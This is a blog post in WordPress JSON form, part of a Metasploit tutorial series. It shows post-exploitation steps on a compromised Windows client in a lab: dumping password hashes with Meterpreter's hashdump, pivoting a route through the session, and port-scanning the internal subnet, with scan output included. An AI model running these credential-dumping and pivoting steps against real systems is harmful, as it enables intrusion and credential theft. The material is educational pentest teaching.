{"id":23,"date":"2010-09-22T02:10:00","date_gmt":"2010-09-22T02:10:00","guid":{"rendered":"http:\/\/www.somethingsomethingsecurity.com\/?p=23"},"modified":"2010-09-22T02:10:00","modified_gmt":"2010-09-22T02:10:00","slug":"metasploit-on-the-edge-part-3-looking-around","status":"publish","type":"post","link":"https:\/\/www.somethingsomethingsecurity.com\/?p=23","title":{"rendered":"Metasploit on the edge Part 3 &#8211; Looking around"},"content":{"rendered":"<p>The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion<\/p>\n<p><strong>Preamble<\/strong>This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement<\/p>\n<p>The following series of posts is going to change a little bit. We will still be walking through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server, but some of the detours I was planning on taking won&#8217;t happen. Vivek from securitytube.net has done an excellent series of video tutorials called the Metasploit Megaprimer and did a much better job of explaining the features of Meterpreter. Please goto securitytube.net and have a look<\/p>\n<p><strong>Background<\/strong><br \/>When last we left, we had just launced a meterpreter session on our internal client. <\/p>\n<p><strong>Process<\/strong><br \/>So now that we have a toe hold, let&#8217;s explore. First things first, I am going to grab the password hashes from the client machine. For a detailed explantion of Windows password hashing, see ironegeek.com&#8217;s password exploitation class. Depending on the exploit used and the account the exploit was run under you may have to do a <br \/>\u00a0\u00a0\u00a0\u00a0 meterpreter><span>use priv<\/span><\/p>\n<p>\u00a0\u00a0\u00a0\u00a0 meterpreter><span>hashdump<\/span><br \/>The hashes will be displayed on the screen. For now, copy and paste them into a file for later use.<br \/>Let&#8217;s setup the client to allow us to use to scan other devices on the internal network.<br \/>First let&#8217;s see what the internal network is like<br \/>\u00a0\u00a0\u00a0\u00a0 meterpreter><span>route<\/span><\/p>\n<p>Network routes<br \/>==============\u00a0\u00a0\u00a0 Subnet\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Netmask\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Gateway<br \/>\u00a0\u00a0\u00a0 &#8212;&#8212;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;-<br \/>\u00a0\u00a0\u00a0 0.0.0.0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0.0.0.0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 10.13.37.1<br \/>\u00a0\u00a0\u00a0 10.13.37.0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 255.255.255.0\u00a0\u00a0\u00a0 10.13.37.149<br \/>\u00a0\u00a0\u00a0 10.13.37.149\u00a0\u00a0\u00a0\u00a0 255.255.255.255\u00a0 127.0.0.1<br \/>\u00a0\u00a0\u00a0 10.255.255.255\u00a0\u00a0 255.255.255.255\u00a0 10.13.37.149<br \/>\u00a0\u00a0\u00a0 127.0.0.0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 255.0.0.0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 127.0.0.1<br \/>Now to use it in Metasploit, press <span>CTRL-Z<\/span> and select <span>Y<\/span> to background the session<\/p>\n<p>Next, we will setup Metasploit to use the client meterpreter session as a route<br \/>\u00a0\u00a0\u00a0\u00a0 meterpreter><span>route add 10.13.37.0 mask 255.255.255.0 4<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ip subnet\u00a0\u00a0\u00a0\u00a0\u00a0 network mask\u00a0\u00a0 meterpreter session<\/p>\n<p>Now lets do a scan: (note: not all scans or exploits will work through this route.) <br \/>We will use the tcp portscan <\/p>\n<p>\u00a0\u00a0\u00a0\u00a0 <span>use auxillary\/scanner\/portscan\/tcp<\/span><\/p>\n<p>\u00a0\u00a0\u00a0\u00a0 msf auxiliary(tcp) ><span> show options<\/span><\/p>\n<p>Module options:<br \/>\u00a0\u00a0 Name\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Current Setting\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Required\u00a0 Description<br \/>\u00a0\u00a0 &#8212;-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8212;&#8212;&#8211;\u00a0 &#8212;&#8212;&#8212;&#8211;<br \/>\u00a0\u00a0 CONCURRENCY\u00a0 10\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The number of concurrent ports to check per host<br \/>\u00a0\u00a0 PORTS\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 21-25,80,137-139,443-445,3389\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ports to scan (e.g. 22-25,80,110-900)<br \/>\u00a0\u00a0 RHOSTS\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 10.13.37.1-254\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The target address range or CIDR identifier<br \/>\u00a0\u00a0 THREADS\u00a0\u00a0\u00a0\u00a0\u00a0 1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The number of concurrent threads<br \/>\u00a0\u00a0 TIMEOUT\u00a0\u00a0\u00a0\u00a0\u00a0 1000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The socket connect timeout in milliseconds<br \/>\u00a0\u00a0 VERBOSE\u00a0\u00a0\u00a0\u00a0\u00a0 false\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 no\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Display verbose output<br \/>Note: When doing your initial scan, it is best to limit your ports. Once you have some responses, you can scan more ports on a particual client\u00a0 if nescessary.\u00a0 <br \/>\u00a0\u00a0\u00a0\u00a0 msf auxiliary(tcp) ><span>exploit<\/span><\/p>\n<p>[*] 10.13.37.1:21 &#8211; TCP OPEN<br \/>[*] 10.13.37.1:80 &#8211; TCP OPEN<br \/>[*] Scanned 026 of 254 hosts (010% complete)<br \/>[*] Scanned 051 of 254 hosts (020% complete)<br \/>[*] Scanned 077 of 254 hosts (030% complete)<br \/>[*] Scanned 102 of 254 hosts (040% complete)<br \/>[*] Scanned 127 of 254 hosts (050% complete)<br \/>[*] 10.13.37.130:80 &#8211; TCP OPEN<br \/>[*] 10.13.37.130:25 &#8211; TCP OPEN<br \/>[*] 10.13.37.130:139 &#8211; TCP OPEN<br \/>[*] 10.13.37.130:443 &#8211; TCP OPEN<br \/>[*] 10.13.37.130:445 &#8211; TCP OPEN<br \/>[*] 10.13.37.130:3389 &#8211; TCP OPEN[*] Scanned 153 of 254 hosts (060% complete)<br \/>[*] Scanned 178 of 254 hosts (070% complete)<br \/>[*] Scanned 204 of 254 hosts (080% complete)<br \/>[*] Scanned 229 of 254 hosts (090% complete)<br \/>[*] 10.13.37.242:22 &#8211; TCP OPEN<br \/>[*] 10.13.37.242:80 &#8211; TCP OPEN<br \/>[*] 10.13.37.242:139 &#8211; TCP OPEN<br \/>[*] 10.13.37.242:445 &#8211; TCP OPEN<br \/>[*] 10.13.37.244:135 &#8211; TCP OPEN<br \/>[*] 10.13.37.244:139 &#8211; TCP OPEN<br \/>[*] 10.13.37.244:445 &#8211; TCP OPEN<br \/>[*] 10.13.37.245:22 &#8211; TCP OPEN<br \/>[*] 10.13.37.245:23 &#8211; TCP OPEN<br \/>[*] 10.13.37.245:21 &#8211; TCP OPEN<br \/>[*] 10.13.37.245:25 &#8211; TCP OPEN<br \/>[*] 10.13.37.245:80 &#8211; TCP OPEN<br \/>[*] 10.13.37.245:139 &#8211; TCP OPEN<br \/>[*] 10.13.37.245:445 &#8211; TCP OPEN<br \/>[*] Scanned 254 of 254 hosts (100% complete)<br \/>[*] Auxiliary module execution completed<\/p>\n<p><strong>Next Steps<\/strong><br \/>Selecting the next target, creating a &#8220;backdoor&#8221;&#8230;maybe I will also spend some time making these posts look better too&#8230;..<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion PreambleThis exercise is for educational use only, and is intended [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,3],"tags":[],"class_list":["post-23","post","type-post","status-publish","format-standard","hentry","category-metasploit","category-red"],"_links":{"self":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/23","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23"}],"version-history":[{"count":0,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/23\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}